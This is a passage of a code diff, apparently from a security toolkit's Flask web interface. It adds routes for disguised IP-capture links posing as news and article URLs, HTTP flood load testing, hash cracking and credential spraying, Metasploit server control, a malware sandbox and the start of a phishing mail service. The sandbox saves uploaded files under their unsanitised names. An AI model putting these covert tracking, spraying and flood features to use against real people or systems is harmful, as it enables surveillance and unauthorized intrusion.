return jsonify({'ok': False, 'error': 'Link not found'})
|
||||
|
||||
|
||||
@ipcapture_bp.route('/ipcapture/links/<key>/export')
|
||||
@login_required
|
||||
def export_captures(key):
|
||||
fmt = request.args.get('format', 'json')
|
||||
data = _svc().export_captures(key, fmt)
|
||||
mime = 'text/csv' if fmt == 'csv' else 'application/json'
|
||||
ext = 'csv' if fmt == 'csv' else 'json'
|
||||
return Response(data, mimetype=mime,
|
||||
headers={'Content-Disposition': f'attachment; filename=captures_{key}.{ext}'})
|
||||
|
||||
|
||||
# ── Capture Endpoints (NO AUTH — accessed by targets) ────────────────────────
|
||||
|
||||
@ipcapture_bp.route('/c/<key>')
|
||||
def capture_short(key):
|
||||
"""Short capture URL — /c/xxxxx"""
|
||||
return _do_capture(key)
|
||||
|
||||
|
||||
@ipcapture_bp.route('/article/<path:subpath>')
|
||||
def capture_article(subpath):
|
||||
"""Article-style capture URL — /article/2026/03/title-slug"""
|
||||
svc = _svc()
|
||||
full_path = '/article/' + subpath
|
||||
link = svc.find_by_path(full_path)
|
||||
if not link:
|
||||
return Response('Not Found', status=404)
|
||||
return _do_capture(link['key'])
|
||||
|
||||
|
||||
@ipcapture_bp.route('/news/<path:subpath>')
|
||||
def capture_news(subpath):
|
||||
"""News-style capture URL."""
|
||||
svc = _svc()
|
||||
full_path = '/news/' + subpath
|
||||
link = svc.find_by_path(full_path)
|
||||
if not link:
|
||||
return Response('Not Found', status=404)
|
||||
return _do_capture(link['key'])
|
||||
|
||||
|
||||
@ipcapture_bp.route('/stories/<path:subpath>')
|
||||
def capture_stories(subpath):
|
||||
"""Stories-style capture URL."""
|
||||
svc = _svc()
|
||||
full_path = '/stories/' + subpath
|
||||
link = svc.find_by_path(full_path)
|
||||
if not link:
|
||||
return Response('Not Found', status=404)
|
||||
return _do_capture(link['key'])
|
||||
|
||||
|
||||
@ipcapture_bp.route('/p/<path:subpath>')
|
||||
def capture_page(subpath):
|
||||
"""Page-style capture URL."""
|
||||
svc = _svc()
|
||||
full_path = '/p/' + subpath
|
||||
link = svc.find_by_path(full_path)
|
||||
if not link:
|
||||
return Response('Not Found', status=404)
|
||||
return _do_capture(link['key'])
|
||||
|
||||
|
||||
@ipcapture_bp.route('/read/<path:subpath>')
|
||||
def capture_read(subpath):
|
||||
"""Read-style capture URL."""
|
||||
svc = _svc()
|
||||
full_path = '/read/' + subpath
|
||||
link = svc.find_by_path(full_path)
|
||||
if not link:
|
||||
return Response('Not Found', status=404)
|
||||
return _do_capture(link['key'])
|
||||
|
||||
|
||||
def _do_capture(key):
|
||||
"""Perform the actual IP capture and redirect."""
|
||||
svc = _svc()
|
||||
link = svc.get_link(key)
|
||||
if not link or not link.get('active'):
|
||||
return Response('Not Found', status=404)
|
||||
|
||||
# Get real client IP
|
||||
ip = (request.headers.get('X-Forwarded-For', '').split(',')[0].strip()
|
||||
or request.headers.get('X-Real-IP', '')
|
||||
or request.remote_addr)
|
||||
|
||||
# Record capture with all available metadata
|
||||
svc.record_capture(
|
||||
key=key,
|
||||
ip=ip,
|
||||
user_agent=request.headers.get('User-Agent', ''),
|
||||
accept_language=request.headers.get('Accept-Language', ''),
|
||||
referer=request.headers.get('Referer', ''),
|
||||
headers=dict(request.headers),
|
||||
)
|
||||
|
||||
# Fast 302 redirect — no page render, minimal latency
|
||||
target = link['target_url']
|
||||
resp = redirect(target, code=302)
|
||||
# Clean headers — no suspicious indicators
|
||||
resp.headers.pop('X-Content-Type-Options', None)
|
||||
resp.headers['Server'] = 'nginx'
|
||||
resp.headers['Cache-Control'] = 'no-cache'
|
||||
return resp
|
||||
144
web/routes/loadtest.py
Normal file
144
web/routes/loadtest.py
Normal file
@ -0,0 +1,144 @@
|
||||
"""Load testing web routes — start/stop/monitor load tests from the web UI."""
|
||||
|
||||
import json
|
||||
import queue
|
||||
from flask import Blueprint, render_template, request, jsonify, Response
|
||||
from web.auth import login_required
|
||||
|
||||
loadtest_bp = Blueprint('loadtest', __name__, url_prefix='/loadtest')
|
||||
|
||||
|
||||
@loadtest_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('loadtest.html')
|
||||
|
||||
|
||||
@loadtest_bp.route('/start', methods=['POST'])
|
||||
@login_required
|
||||
def start():
|
||||
"""Start a load test."""
|
||||
data = request.get_json(silent=True) or {}
|
||||
target = data.get('target', '').strip()
|
||||
if not target:
|
||||
return jsonify({'ok': False, 'error': 'Target is required'})
|
||||
|
||||
try:
|
||||
from modules.loadtest import get_load_tester
|
||||
tester = get_load_tester()
|
||||
|
||||
if tester.running:
|
||||
return jsonify({'ok': False, 'error': 'A test is already running'})
|
||||
|
||||
config = {
|
||||
'target': target,
|
||||
'attack_type': data.get('attack_type', 'http_flood'),
|
||||
'workers': int(data.get('workers', 10)),
|
||||
'duration': int(data.get('duration', 30)),
|
||||
'requests_per_worker': int(data.get('requests_per_worker', 0)),
|
||||
'ramp_pattern': data.get('ramp_pattern', 'constant'),
|
||||
'ramp_duration': int(data.get('ramp_duration', 0)),
|
||||
'method': data.get('method', 'GET'),
|
||||
'headers': data.get('headers', {}),
|
||||
'body': data.get('body', ''),
|
||||
'timeout': int(data.get('timeout', 10)),
|
||||
'follow_redirects': data.get('follow_redirects', True),
|
||||
'verify_ssl': data.get('verify_ssl', False),
|
||||
'rotate_useragent': data.get('rotate_useragent', True),
|
||||
'custom_useragent': data.get('custom_useragent', ''),
|
||||
'rate_limit': int(data.get('rate_limit', 0)),
|
||||
'payload_size': int(data.get('payload_size', 1024)),
|
||||
}
|
||||
|
||||
tester.start(config)
|
||||
return jsonify({'ok': True, 'message': 'Test started'})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@loadtest_bp.route('/stop', methods=['POST'])
|
||||
@login_required
|
||||
def stop():
|
||||
"""Stop the running load test."""
|
||||
try:
|
||||
from modules.loadtest import get_load_tester
|
||||
tester = get_load_tester()
|
||||
tester.stop()
|
||||
return jsonify({'ok': True})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@loadtest_bp.route('/pause', methods=['POST'])
|
||||
@login_required
|
||||
def pause():
|
||||
"""Pause the running load test."""
|
||||
try:
|
||||
from modules.loadtest import get_load_tester
|
||||
tester = get_load_tester()
|
||||
tester.pause()
|
||||
return jsonify({'ok': True})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@loadtest_bp.route('/resume', methods=['POST'])
|
||||
@login_required
|
||||
def resume():
|
||||
"""Resume a paused load test."""
|
||||
try:
|
||||
from modules.loadtest import get_load_tester
|
||||
tester = get_load_tester()
|
||||
tester.resume()
|
||||
return jsonify({'ok': True})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@loadtest_bp.route('/status')
|
||||
@login_required
|
||||
def status():
|
||||
"""Get current test status and metrics."""
|
||||
try:
|
||||
from modules.loadtest import get_load_tester
|
||||
tester = get_load_tester()
|
||||
metrics = tester.metrics.to_dict() if tester.running else {}
|
||||
return jsonify({
|
||||
'running': tester.running,
|
||||
'paused': not tester._pause_event.is_set() if tester.running else False,
|
||||
'metrics': metrics,
|
||||
})
|
||||
except Exception as e:
|
||||
return jsonify({'running': False, 'error': str(e)})
|
||||
|
||||
|
||||
@loadtest_bp.route('/stream')
|
||||
@login_required
|
||||
def stream():
|
||||
"""SSE stream for live metrics."""
|
||||
try:
|
||||
from modules.loadtest import get_load_tester
|
||||
tester = get_load_tester()
|
||||
except Exception:
|
||||
return Response("data: {}\n\n", mimetype='text/event-stream')
|
||||
|
||||
sub = tester.subscribe()
|
||||
|
||||
def generate():
|
||||
try:
|
||||
while tester.running:
|
||||
try:
|
||||
data = sub.get(timeout=2)
|
||||
yield f"data: {json.dumps(data)}\n\n"
|
||||
except queue.Empty:
|
||||
# Send keepalive
|
||||
m = tester.metrics.to_dict() if tester.running else {}
|
||||
yield f"data: {json.dumps({'type': 'metrics', 'data': m})}\n\n"
|
||||
# Send final metrics
|
||||
m = tester.metrics.to_dict()
|
||||
yield f"data: {json.dumps({'type': 'done', 'data': m})}\n\n"
|
||||
finally:
|
||||
tester.unsubscribe(sub)
|
||||
|
||||
return Response(generate(), mimetype='text/event-stream',
|
||||
headers={'Cache-Control': 'no-cache', 'X-Accel-Buffering': 'no'})
|
||||
82
web/routes/log_correlator.py
Normal file
82
web/routes/log_correlator.py
Normal file
@ -0,0 +1,82 @@
|
||||
"""Log Correlator routes."""
|
||||
from flask import Blueprint, request, jsonify, render_template
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
log_correlator_bp = Blueprint('log_correlator', __name__, url_prefix='/logs')
|
||||
|
||||
def _get_engine():
|
||||
from modules.log_correlator import get_log_correlator
|
||||
return get_log_correlator()
|
||||
|
||||
@log_correlator_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('log_correlator.html')
|
||||
|
||||
@log_correlator_bp.route('/ingest/file', methods=['POST'])
|
||||
@login_required
|
||||
def ingest_file():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().ingest_file(data.get('path', ''), data.get('source')))
|
||||
|
||||
@log_correlator_bp.route('/ingest/text', methods=['POST'])
|
||||
@login_required
|
||||
def ingest_text():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_engine().ingest_text(data.get('text', ''), data.get('source', 'paste')))
|
||||
|
||||
@log_correlator_bp.route('/search')
|
||||
@login_required
|
||||
def search():
|
||||
return jsonify(_get_engine().search_logs(
|
||||
request.args.get('q', ''), request.args.get('source'),
|
||||
int(request.args.get('limit', 100))
|
||||
))
|
||||
|
||||
@log_correlator_bp.route('/alerts', methods=['GET', 'DELETE'])
|
||||
@login_required
|
||||
def alerts():
|
||||
if request.method == 'DELETE':
|
||||
_get_engine().clear_alerts()
|
||||
return jsonify({'ok': True})
|
||||
return jsonify(_get_engine().get_alerts(
|
||||
request.args.get('severity'), int(request.args.get('limit', 100))
|
||||
))
|
||||
|
||||
@log_correlator_bp.route('/rules', methods=['GET', 'POST', 'DELETE'])
|
||||
@login_required
|
||||
def rules():
|
||||
engine = _get_engine()
|
||||
if request.method == 'POST':
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(engine.add_rule(
|
||||
rule_id=data.get('id', ''), name=data.get('name', ''),
|
||||
pattern=data.get('pattern', ''), severity=data.get('severity', 'medium'),
|
||||
threshold=data.get('threshold', 1), window_seconds=data.get('window_seconds', 0),
|
||||
description=data.get('description', '')
|
||||
))
|
||||
elif request.method == 'DELETE':
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(engine.remove_rule(data.get('id', '')))
|
||||
return jsonify(engine.get_rules())
|
||||
|
||||
@log_correlator_bp.route('/stats')
|
||||
@login_required
|
||||
def stats():
|
||||
return jsonify(_get_engine().get_stats())
|
||||
|
||||
@log_correlator_bp.route('/sources')
|
||||
@login_required
|
||||
def sources():
|
||||
return jsonify(_get_engine().get_sources())
|
||||
|
||||
@log_correlator_bp.route('/timeline')
|
||||
@login_required
|
||||
def timeline():
|
||||
return jsonify(_get_engine().get_timeline(int(request.args.get('hours', 24))))
|
||||
|
||||
@log_correlator_bp.route('/clear', methods=['POST'])
|
||||
@login_required
|
||||
def clear():
|
||||
_get_engine().clear_logs()
|
||||
return jsonify({'ok': True})
|
||||
71
web/routes/malware_sandbox.py
Normal file
71
web/routes/malware_sandbox.py
Normal file
@ -0,0 +1,71 @@
|
||||
"""Malware Sandbox routes."""
|
||||
import os
|
||||
from flask import Blueprint, request, jsonify, render_template, current_app
|
||||
from web.routes.auth_routes import login_required
|
||||
|
||||
malware_sandbox_bp = Blueprint('malware_sandbox', __name__, url_prefix='/sandbox')
|
||||
|
||||
def _get_sandbox():
|
||||
from modules.malware_sandbox import get_sandbox
|
||||
return get_sandbox()
|
||||
|
||||
@malware_sandbox_bp.route('/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('malware_sandbox.html')
|
||||
|
||||
@malware_sandbox_bp.route('/status')
|
||||
@login_required
|
||||
def status():
|
||||
return jsonify(_get_sandbox().get_status())
|
||||
|
||||
@malware_sandbox_bp.route('/submit', methods=['POST'])
|
||||
@login_required
|
||||
def submit():
|
||||
sb = _get_sandbox()
|
||||
if request.content_type and 'multipart' in request.content_type:
|
||||
f = request.files.get('sample')
|
||||
if not f:
|
||||
return jsonify({'ok': False, 'error': 'No file uploaded'})
|
||||
upload_dir = current_app.config.get('UPLOAD_FOLDER', '/tmp')
|
||||
filepath = os.path.join(upload_dir, f.filename)
|
||||
f.save(filepath)
|
||||
return jsonify(sb.submit_sample(filepath, f.filename))
|
||||
else:
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(sb.submit_sample(data.get('path', ''), data.get('name')))
|
||||
|
||||
@malware_sandbox_bp.route('/samples')
|
||||
@login_required
|
||||
def samples():
|
||||
return jsonify(_get_sandbox().list_samples())
|
||||
|
||||
@malware_sandbox_bp.route('/static', methods=['POST'])
|
||||
@login_required
|
||||
def static_analysis():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_sandbox().static_analysis(data.get('path', '')))
|
||||
|
||||
@malware_sandbox_bp.route('/dynamic', methods=['POST'])
|
||||
@login_required
|
||||
def dynamic_analysis():
|
||||
data = request.get_json(silent=True) or {}
|
||||
job_id = _get_sandbox().dynamic_analysis(data.get('path', ''), data.get('timeout', 60))
|
||||
return jsonify({'ok': bool(job_id), 'job_id': job_id})
|
||||
|
||||
@malware_sandbox_bp.route('/report', methods=['POST'])
|
||||
@login_required
|
||||
def generate_report():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_get_sandbox().generate_report(data.get('path', '')))
|
||||
|
||||
@malware_sandbox_bp.route('/reports')
|
||||
@login_required
|
||||
def reports():
|
||||
return jsonify(_get_sandbox().list_reports())
|
||||
|
||||
@malware_sandbox_bp.route('/job/<job_id>')
|
||||
@login_required
|
||||
def job_status(job_id):
|
||||
job = _get_sandbox().get_job(job_id)
|
||||
return jsonify(job or {'error': 'Job not found'})
|
||||
85
web/routes/net_mapper.py
Normal file
85
web/routes/net_mapper.py
Normal file
@ -0,0 +1,85 @@
|
||||
"""Network Topology Mapper — web routes."""
|
||||
|
||||
from flask import Blueprint, render_template, request, jsonify
|
||||
from web.auth import login_required
|
||||
|
||||
net_mapper_bp = Blueprint('net_mapper', __name__)
|
||||
|
||||
|
||||
def _svc():
|
||||
from modules.net_mapper import get_net_mapper
|
||||
return get_net_mapper()
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('net_mapper.html')
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/discover', methods=['POST'])
|
||||
@login_required
|
||||
def discover():
|
||||
data = request.get_json(silent=True) or {}
|
||||
target = data.get('target', '').strip()
|
||||
if not target:
|
||||
return jsonify({'ok': False, 'error': 'Target required'})
|
||||
return jsonify(_svc().discover_hosts(target, method=data.get('method', 'auto')))
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/discover/<job_id>', methods=['GET'])
|
||||
@login_required
|
||||
def discover_status(job_id):
|
||||
return jsonify(_svc().get_job_status(job_id))
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/scan-host', methods=['POST'])
|
||||
@login_required
|
||||
def scan_host():
|
||||
data = request.get_json(silent=True) or {}
|
||||
ip = data.get('ip', '').strip()
|
||||
if not ip:
|
||||
return jsonify({'ok': False, 'error': 'IP required'})
|
||||
return jsonify(_svc().scan_host(ip,
|
||||
port_range=data.get('port_range', '1-1024'),
|
||||
service_detection=data.get('service_detection', True),
|
||||
os_detection=data.get('os_detection', True)))
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/topology', methods=['POST'])
|
||||
@login_required
|
||||
def build_topology():
|
||||
data = request.get_json(silent=True) or {}
|
||||
hosts = data.get('hosts', [])
|
||||
return jsonify({'ok': True, **_svc().build_topology(hosts)})
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/scans', methods=['GET'])
|
||||
@login_required
|
||||
def list_scans():
|
||||
return jsonify({'ok': True, 'scans': _svc().list_scans()})
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/scans', methods=['POST'])
|
||||
@login_required
|
||||
def save_scan():
|
||||
data = request.get_json(silent=True) or {}
|
||||
name = data.get('name', 'unnamed')
|
||||
hosts = data.get('hosts', [])
|
||||
return jsonify(_svc().save_scan(name, hosts))
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/scans/<filename>', methods=['GET'])
|
||||
@login_required
|
||||
def load_scan(filename):
|
||||
data = _svc().load_scan(filename)
|
||||
if data:
|
||||
return jsonify({'ok': True, 'scan': data})
|
||||
return jsonify({'ok': False, 'error': 'Scan not found'})
|
||||
|
||||
|
||||
@net_mapper_bp.route('/net-mapper/diff', methods=['POST'])
|
||||
@login_required
|
||||
def diff_scans():
|
||||
data = request.get_json(silent=True) or {}
|
||||
return jsonify(_svc().diff_scans(data.get('scan1', ''), data.get('scan2', '')))
|
||||
@ -1,4 +1,4 @@
|
||||
"""Offense category route - MSF status, module search, sessions, module browsing, module execution."""
|
||||
"""Offense category route - MSF server control, module search, sessions, browsing, execution."""
|
||||
|
||||
import json
|
||||
import threading
|
||||
@ -24,24 +24,190 @@ def index():
|
||||
@offense_bp.route('/status')
|
||||
@login_required
|
||||
def status():
|
||||
"""Get MSF connection status."""
|
||||
"""Get MSF connection and server status."""
|
||||
try:
|
||||
from core.msf_interface import get_msf_interface
|
||||
from core.msf import get_msf_manager
|
||||
msf = get_msf_interface()
|
||||
mgr = get_msf_manager()
|
||||
connected = msf.is_connected
|
||||
settings = mgr.get_settings()
|
||||
|
||||
result = {'connected': connected}
|
||||
# Check if server process is running
|
||||
server_running, server_pid = mgr.detect_server()
|
||||
|
||||
result = {
|
||||
'connected': connected,
|
||||
'server_running': server_running,
|
||||
'server_pid': server_pid,
|
||||
'host': settings.get('host', '127.0.0.1'),
|
||||
'port': settings.get('port', 55553),
|
||||
'username': settings.get('username', 'msf'),
|
||||
'ssl': settings.get('ssl', True),
|
||||
'has_password': bool(settings.get('password', '')),
|
||||
}
|
||||
if connected:
|
||||
try:
|
||||
settings = msf.manager.get_settings()
|
||||
result['host'] = settings.get('host', 'localhost')
|
||||
result['port'] = settings.get('port', 55553)
|
||||
version = msf.manager.rpc.get_version()
|
||||
result['version'] = version.get('version', '')
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return jsonify(result)
|
||||
except Exception:
|
||||
return jsonify({'connected': False})
|
||||
except Exception as e:
|
||||
return jsonify({'connected': False, 'server_running': False, 'error': str(e)})
|
||||
|
||||
|
||||
@offense_bp.route('/connect', methods=['POST'])
|
||||
@login_required
|
||||
def connect():
|
||||
"""Connect to MSF RPC server."""
|
||||
data = request.get_json(silent=True) or {}
|
||||
password = data.get('password', '').strip()
|
||||
|
||||
try:
|
||||
from core.msf import get_msf_manager
|
||||
mgr = get_msf_manager()
|
||||
settings = mgr.get_settings()
|
||||
|
||||
# Use provided password or saved one
|
||||
pwd = password or settings.get('password', '')
|
||||
if not pwd:
|
||||
return jsonify({'ok': False, 'error': 'Password required'})
|
||||
|
||||
mgr.connect(pwd)
|
||||
version = mgr.rpc.get_version() if mgr.rpc else {}
|
||||
return jsonify({
|
||||
'ok': True,
|
||||
'version': version.get('version', 'Connected')
|
||||
})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@offense_bp.route('/disconnect', methods=['POST'])
|
||||
@login_required
|
||||
def disconnect():
|
||||
"""Disconnect from MSF RPC server."""
|
||||
try:
|
||||
from core.msf import get_msf_manager
|
||||
mgr = get_msf_manager()
|
||||
mgr.disconnect()
|
||||
return jsonify({'ok': True})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@offense_bp.route('/server/start', methods=['POST'])
|
||||
@login_required
|
||||
def start_server():
|
||||
"""Start the MSF RPC server."""
|
||||
data = request.get_json(silent=True) or {}
|
||||
|
||||
try:
|
||||
from core.msf import get_msf_manager
|
||||
mgr = get_msf_manager()
|
||||
settings = mgr.get_settings()
|
||||
|
||||
username = data.get('username', '').strip() or settings.get('username', 'msf')
|
||||
password = data.get('password', '').strip() or settings.get('password', '')
|
||||
host = data.get('host', '').strip() or settings.get('host', '127.0.0.1')
|
||||
port = int(data.get('port', 0) or settings.get('port', 55553))
|
||||
use_ssl = data.get('ssl', settings.get('ssl', True))
|
||||
|
||||
if not password:
|
||||
return jsonify({'ok': False, 'error': 'Password required to start server'})
|
||||
|
||||
# Save settings
|
||||
mgr.save_settings(host, port, username, password, use_ssl)
|
||||
|
||||
# Kill existing server if running
|
||||
is_running, _ = mgr.detect_server()
|
||||
if is_running:
|
||||
mgr.kill_server(use_sudo=False)
|
||||
|
||||
# Start server (no sudo on web — would hang waiting for password)
|
||||
import sys
|
||||
use_sudo = sys.platform != 'win32' and data.get('sudo', False)
|
||||
ok = mgr.start_server(username, password, host, port, use_ssl, use_sudo=use_sudo)
|
||||
|
||||
if ok:
|
||||
# Auto-connect after starting
|
||||
try:
|
||||
mgr.connect(password)
|
||||
version = mgr.rpc.get_version() if mgr.rpc else {}
|
||||
return jsonify({
|
||||
'ok': True,
|
||||
'message': 'Server started and connected',
|
||||
'version': version.get('version', '')
|
||||
})
|
||||
except Exception:
|
||||
return jsonify({'ok': True, 'message': 'Server started (connect manually)'})
|
||||
else:
|
||||
return jsonify({'ok': False, 'error': 'Failed to start server'})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@offense_bp.route('/server/stop', methods=['POST'])
|
||||
@login_required
|
||||
def stop_server():
|
||||
"""Stop the MSF RPC server."""
|
||||
try:
|
||||
from core.msf import get_msf_manager
|
||||
mgr = get_msf_manager()
|
||||
ok = mgr.kill_server(use_sudo=False)
|
||||
return jsonify({'ok': ok})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@offense_bp.route('/settings', methods=['POST'])
|
||||
@login_required
|
||||
def save_settings():
|
||||
"""Save MSF connection settings."""
|
||||
data = request.get_json(silent=True) or {}
|
||||
try:
|
||||
from core.msf import get_msf_manager
|
||||
mgr = get_msf_manager()
|
||||
mgr.save_settings(
|
||||
host=data.get('host', '127.0.0.1'),
|
||||
port=int(data.get('port', 55553)),
|
||||
username=data.get('username', 'msf'),
|
||||
password=data.get('password', ''),
|
||||
use_ssl=data.get('ssl', True),
|
||||
)
|
||||
return jsonify({'ok': True})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@offense_bp.route('/jobs')
|
||||
@login_required
|
||||
def list_jobs():
|
||||
"""List running MSF jobs."""
|
||||
try:
|
||||
from core.msf_interface import get_msf_interface
|
||||
msf = get_msf_interface()
|
||||
if not msf.is_connected:
|
||||
return jsonify({'jobs': {}, 'error': 'Not connected to MSF'})
|
||||
jobs = msf.list_jobs()
|
||||
return jsonify({'jobs': jobs})
|
||||
except Exception as e:
|
||||
return jsonify({'jobs': {}, 'error': str(e)})
|
||||
|
||||
|
||||
@offense_bp.route('/jobs/<job_id>/stop', methods=['POST'])
|
||||
@login_required
|
||||
def stop_job(job_id):
|
||||
"""Stop a running MSF job."""
|
||||
try:
|
||||
from core.msf_interface import get_msf_interface
|
||||
msf = get_msf_interface()
|
||||
ok = msf.stop_job(job_id)
|
||||
return jsonify({'ok': ok})
|
||||
except Exception as e:
|
||||
return jsonify({'ok': False, 'error': str(e)})
|
||||
|
||||
|
||||
@offense_bp.route('/search', methods=['POST'])
|
||||
|
||||
144
web/routes/password_toolkit.py
Normal file
144
web/routes/password_toolkit.py
Normal file
@ -0,0 +1,144 @@
|
||||
"""Password Toolkit — web routes for hash cracking, generation, and auditing."""
|
||||
|
||||
from flask import Blueprint, render_template, request, jsonify
|
||||
from web.auth import login_required
|
||||
|
||||
password_toolkit_bp = Blueprint('password_toolkit', __name__)
|
||||
|
||||
|
||||
def _svc():
|
||||
from modules.password_toolkit import get_password_toolkit
|
||||
return get_password_toolkit()
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/')
|
||||
@login_required
|
||||
def index():
|
||||
return render_template('password_toolkit.html')
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/identify', methods=['POST'])
|
||||
@login_required
|
||||
def identify_hash():
|
||||
data = request.get_json(silent=True) or {}
|
||||
hashes = data.get('hashes', [])
|
||||
single = data.get('hash', '').strip()
|
||||
if single:
|
||||
hashes = [single]
|
||||
if not hashes:
|
||||
return jsonify({'ok': False, 'error': 'No hash provided'})
|
||||
svc = _svc()
|
||||
if len(hashes) == 1:
|
||||
return jsonify({'ok': True, 'types': svc.identify_hash(hashes[0])})
|
||||
return jsonify({'ok': True, 'results': svc.identify_batch(hashes)})
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/crack', methods=['POST'])
|
||||
@login_required
|
||||
def crack_hash():
|
||||
data = request.get_json(silent=True) or {}
|
||||
hash_str = data.get('hash', '').strip()
|
||||
if not hash_str:
|
||||
return jsonify({'ok': False, 'error': 'No hash provided'})
|
||||
svc = _svc()
|
||||
result = svc.crack_hash(
|
||||
hash_str=hash_str,
|
||||
hash_type=data.get('hash_type', 'auto'),
|
||||
wordlist=data.get('wordlist', ''),
|
||||
attack_mode=data.get('attack_mode', 'dictionary'),
|
||||
rules=data.get('rules', ''),
|
||||
mask=data.get('mask', ''),
|
||||
tool=data.get('tool', 'auto'),
|
||||
)
|
||||
return jsonify(result)
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/crack/<job_id>', methods=['GET'])
|
||||
@login_required
|
||||
def crack_status(job_id):
|
||||
return jsonify(_svc().get_crack_status(job_id))
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/generate', methods=['POST'])
|
||||
@login_required
|
||||
def generate():
|
||||
data = request.get_json(silent=True) or {}
|
||||
svc = _svc()
|
||||
passwords = svc.generate_password(
|
||||
length=data.get('length', 16),
|
||||
count=data.get('count', 5),
|
||||
uppercase=data.get('uppercase', True),
|
||||
lowercase=data.get('lowercase', True),
|
||||
digits=data.get('digits', True),
|
||||
symbols=data.get('symbols', True),
|
||||
exclude_chars=data.get('exclude_chars', ''),
|
||||
pattern=data.get('pattern', ''),
|
||||
)
|
||||
audits = [svc.audit_password(pw) for pw in passwords]
|
||||
return jsonify({'ok': True, 'passwords': [
|
||||
{'password': pw, **audit} for pw, audit in zip(passwords, audits)
|
||||
]})
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/audit', methods=['POST'])
|
||||
@login_required
|
||||
def audit():
|
||||
data = request.get_json(silent=True) or {}
|
||||
pw = data.get('password', '')
|
||||
if not pw:
|
||||
return jsonify({'ok': False, 'error': 'No password provided'})
|
||||
return jsonify({'ok': True, **_svc().audit_password(pw)})
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/hash', methods=['POST'])
|
||||
@login_required
|
||||
def hash_string():
|
||||
data = request.get_json(silent=True) or {}
|
||||
plaintext = data.get('plaintext', '')
|
||||
algorithm = data.get('algorithm', 'sha256')
|
||||
return jsonify(_svc().hash_string(plaintext, algorithm))
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/spray', methods=['POST'])
|
||||
@login_required
|
||||
def spray():
|
||||
data = request.get_json(silent=True) or {}
|
||||
targets = data.get('targets', [])
|
||||
passwords = data.get('passwords', [])
|
||||
protocol = data.get('protocol', 'ssh')
|
||||
delay = data.get('delay', 1.0)
|
||||
return jsonify(_svc().credential_spray(targets, passwords, protocol, delay=delay))
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/spray/<job_id>', methods=['GET'])
|
||||
@login_required
|
||||
def spray_status(job_id):
|
||||
return jsonify(_svc().get_spray_status(job_id))
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/wordlists', methods=['GET'])
|
||||
@login_required
|
||||
def list_wordlists():
|
||||
return jsonify({'ok': True, 'wordlists': _svc().list_wordlists()})
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/wordlists', methods=['POST'])
|
||||
@login_required
|
||||
def upload_wordlist():
|
||||
f = request.files.get('file')
|
||||
if not f or not f.filename:
|
||||
return jsonify({'ok': False, 'error': 'No file uploaded'})
|
||||
data = f.read()
|
||||
return jsonify(_svc().upload_wordlist(f.filename, data))
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/wordlists/<name>', methods=['DELETE'])
|
||||
@login_required
|
||||
def delete_wordlist(name):
|
||||
return jsonify(_svc().delete_wordlist(name))
|
||||
|
||||
|
||||
@password_toolkit_bp.route('/password-toolkit/tools', methods=['GET'])
|
||||
@login_required
|
||||
def tools_status():
|
||||
return jsonify({'ok': True, **_svc().get_tools_status()})
|
||||
516
web/routes/phishmail.py
Normal file
516
web/routes/phishmail.py
Normal file
@ -0,0 +1,516 @@
|
||||
"""Gone Fishing Mail Service — web routes."""
|
||||
|
||||
import json
|
||||
import base64
|
||||
from flask import (Blueprint, render_template, request, jsonify,
|
||||
Response, redirect, send_file)
|
||||
from web.auth import login_required
|
||||
|
||||
phishmail_bp = Blueprint('phishmail', __name__, url_prefix='/phishmail')
|
||||
|
||||
|
||||
def _server():
|
||||
from modules.phishmail import get_gone_fishing
|
||||
return get_gone_fishing()
|
||||
